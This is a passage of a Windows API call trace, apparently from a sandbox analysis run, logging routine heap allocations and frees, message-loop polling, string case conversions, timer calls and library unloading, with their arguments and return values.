Size=0x8) returned 0x24b1778 [0190.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0190.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0190.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0190.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0190.769] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0190.769] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0190.770] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0190.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0190.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0190.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0190.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0190.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0190.770] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0190.770] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0190.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0190.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0190.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0190.770] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0190.770] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0190.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0190.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0190.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0190.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0190.770] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0190.770] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0190.770] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0190.770] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0190.770] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0190.770] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.770] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.771] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.771] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0190.771] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.771] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0190.771] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.771] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.771] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0190.771] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.771] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0190.771] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.771] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.771] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.771] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.771] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0190.771] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0190.771] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0190.771] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0190.771] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0190.771] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.771] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.772] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.772] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.772] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.772] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.772] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0190.772] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.772] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0190.772] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.772] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.772] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.772] CryptReleaseContext (hProv=0xaa3868, dwFlags=0x0) returned 1 [0190.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0190.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0190.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0190.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0190.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0190.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0190.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0190.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0190.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0190.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0190.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0190.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0190.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0190.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0190.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0190.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0190.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0190.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0190.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0190.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0190.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0190.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0190.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0190.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0190.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0190.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0190.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0190.774] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 1 [0190.774] TranslateMessage (lpMsg=0x8bf4b0) returned 0 [0190.774] DispatchMessageW (lpMsg=0x8bf4b0) returned 0x0 [0190.774] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0190.774] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0190.774] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0190.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0190.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0190.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0190.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0190.774] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0190.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0190.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa068 [0190.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0190.774] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0190.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0190.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0190.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0190.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0190.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0190.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0190.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0190.775] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0190.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0190.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0190.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0190.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0190.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0190.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0190.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0190.775] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0190.775] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0190.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0190.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0190.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0190.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0190.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0190.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0190.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0190.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0190.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0190.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0190.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0190.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0190.776] FreeLibrary (hLibModule=0x74d40000) returned 1 [0190.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0190.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0190.776] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0190.776] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0190.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0190.776] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0190.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0190.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0190.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0190.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0190.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0190.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0190.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0190.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0190.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0190.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0190.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0190.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0190.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0190.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0190.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0190.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0190.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f18 [0190.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa050 [0190.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa068 [0190.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0190.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa020 [0190.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0190.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0190.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa080 [0190.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0190.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0190.777] CloseHandle (hObject=0x294) returned 1 [0190.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0190.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0190.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0190.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0190.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0190.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0190.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0190.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0190.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0190.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0190.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0190.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0190.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0190.778] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0190.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0190.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0190.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0190.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0190.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0190.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0190.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0190.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0190.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0190.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0190.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0190.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0190.779] HeapFree (in: hHeap=0x25c0000, 